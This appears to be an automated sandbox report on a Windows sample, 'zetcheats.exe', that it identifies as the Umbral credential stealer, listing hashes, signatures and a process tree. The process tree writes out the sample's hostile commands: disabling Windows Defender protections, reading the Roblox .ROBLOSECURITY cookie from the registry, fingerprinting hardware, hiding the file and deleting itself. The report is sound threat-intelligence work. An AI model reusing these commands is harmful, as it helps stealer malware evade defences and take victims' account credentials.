Analysis

  • max time kernel
    51s
  • max time network
    53s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-08-2024 14:00

General

  • Target

    zetcheats/zetcheats.exe

  • Size

    229KB

  • MD5

    a5136c56ea838074a1b521860a45086c

  • SHA1

    576f08a6e5e4ee6f0a438e5c58506e059497d015

  • SHA256

    d4f221f62d10617dbbac44172e5e1d5b106a47c69ac4a2426eff77c9485c0707

  • SHA512

    1dd818b836c898b85459d42f8163be1926149b569c3f918b994f89ddaea7939a27324b6964140008fa394cda77aa84f468361416a7db5ddcc8bba9ff5bc4c5c3

  • SSDEEP

    6144:lloZM+rIkd8g+EtXHkv/iD4ClRVw2xpacPyAxVkQIb8e1mvi:noZtL+EP8ClRVw2xpacPyAxVklN

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\zetcheats\zetcheats.exe
    "C:\Users\Admin\AppData\Local\Temp\zetcheats\zetcheats.exe"
    1⤵
    • Drops file in Drivers directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1460
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3604
    • C:\Windows\SYSTEM32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\zetcheats\zetcheats.exe"
      2⤵
      • Views/modifies file attributes
      PID:1988
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\zetcheats\zetcheats.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:752
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1600
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4480
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4968
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4272
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
        PID:3428
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        2⤵
          PID:1100
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          PID:536
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic" path win32_VideoController get name
          2⤵
          • Detects videocard installed
          PID:1600
        • C:\Windows\SYSTEM32\cmd.exe
          "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\zetcheats\zetcheats.exe" && pause
          2⤵
          • System Network Configuration Discovery: Internet Connection Discovery
          • Suspicious use of WriteProcessMemory
          PID:4280
          • C:\Windows\system32\PING.EXE
            ping localhost
            3⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:2424
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=1020,i,11708048364682646792,608099842549576907,262144 --variations-seed-version --mojo-platform-channel-handle=4088 /prefetch:8
        1⤵
          PID:2988

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          2KB

          MD5

          0e3b2fb1305afa355fb0585c068cdbbd

          SHA1

          b4e9457bfdc38337f64e3b2606aa34861aa6b4ed

          SHA256

          43a303fed06d5928800280cb0bf716790d9f886c87f26faf9fbdfa59b55e9c0d

          SHA512

          6a754dbb33c549ace5f71e169511422284f688c9df1c1e5fac8a633feac24312ba39fa4c682bdc9fe1d1162e2a3bd6190013652e567909417579db4b8791554d

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          944B

          MD5

          e0499ccf2f5e6b93d5e6e1e1d06afe73

          SHA1

          a0169a2e3fccbe56b91a30c2df5abdc0850a0d58

          SHA256

          fdb232420c104c1e639dd928a694b0c00914355df693c9eaa80d6f4d409a1891

          SHA512

          fe7968e8097047c1167325a3bd98485362d4b421a82801b558229a90888012b427f0e64ead460625715fb2b9fea78b2435e5af3d083c192430f7844f198e922b

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          948B

          MD5

          af283a45e468abc28a9ac1c14af0a45d

          SHA1

          6d70a604e1a12e0df9b98a4bf57d335d78986c93

          SHA256

          141a5cbf854b091471384f71c93282c31d166a8676d43559c38086dd6e07229c

          SHA512

          05abb1f812dd979755e811928006974bccf076e8f618061e64db35b129bb78175a99bac6eefa5e11f6f3c4af94f60e9b7da4c4ba07fa740748ff47a4511d4db8

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          548dd08570d121a65e82abb7171cae1c

          SHA1

          1a1b5084b3a78f3acd0d811cc79dbcac121217ab

          SHA256

          cdf17b8532ebcebac3cfe23954a30aa32edd268d040da79c82687e4ccb044adc

          SHA512

          37b98b09178b51eec9599af90d027d2f1028202efc1633047e16e41f1a95610984af5620baac07db085ccfcb96942aafffad17aa1f44f63233e83869dc9f697b

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          6317adf4fbc43ea2fd68861fafd57155

          SHA1

          6b87c718893c83c6eed2767e8d9cbc6443e31913

          SHA256

          c1ead17eef37b4b461cedc276504a441489e819c7f943037f2001966aeec90af

          SHA512

          17229aae8622e4bfc3caaac55684f7d4ccd3162af5919c851b1d8ac4060b6bb7b75044ecee116523d05acb55197dcb60780958f629450edef386f1e6f65f49f0

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_smv5gnjy.cf2.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • memory/752-4-0x00007FF865960000-0x00007FF866421000-memory.dmp

          Filesize

          10.8MB

        • memory/752-14-0x000001E065DF0000-0x000001E065E12000-memory.dmp

          Filesize

          136KB

        • memory/752-15-0x00007FF865960000-0x00007FF866421000-memory.dmp

          Filesize

          10.8MB

        • memory/752-18-0x00007FF865960000-0x00007FF866421000-memory.dmp

          Filesize

          10.8MB

        • memory/752-3-0x00007FF865960000-0x00007FF866421000-memory.dmp

          Filesize

          10.8MB

        • memory/1460-34-0x00000222BFC90000-0x00000222BFCE0000-memory.dmp

          Filesize

          320KB

        • memory/1460-33-0x00000222D8630000-0x00000222D86A6000-memory.dmp

          Filesize

          472KB

        • memory/1460-35-0x00000222BFD00000-0x00000222BFD1E000-memory.dmp

          Filesize

          120KB

        • memory/1460-0-0x00007FF865963000-0x00007FF865965000-memory.dmp

          Filesize

          8KB

        • memory/1460-1-0x00000222BDEC0000-0x00000222BDF00000-memory.dmp

          Filesize

          256KB

        • memory/1460-68-0x00000222D86C0000-0x00000222D86CA000-memory.dmp

          Filesize

          40KB

        • memory/1460-69-0x00000222D94D0000-0x00000222D94E2000-memory.dmp

          Filesize

          72KB

        • memory/1460-2-0x00007FF865960000-0x00007FF866421000-memory.dmp

          Filesize

          10.8MB

        • memory/1460-84-0x00007FF865963000-0x00007FF865965000-memory.dmp

          Filesize

          8KB

        • memory/1460-88-0x00007FF865960000-0x00007FF866421000-memory.dmp

          Filesize

          10.8MB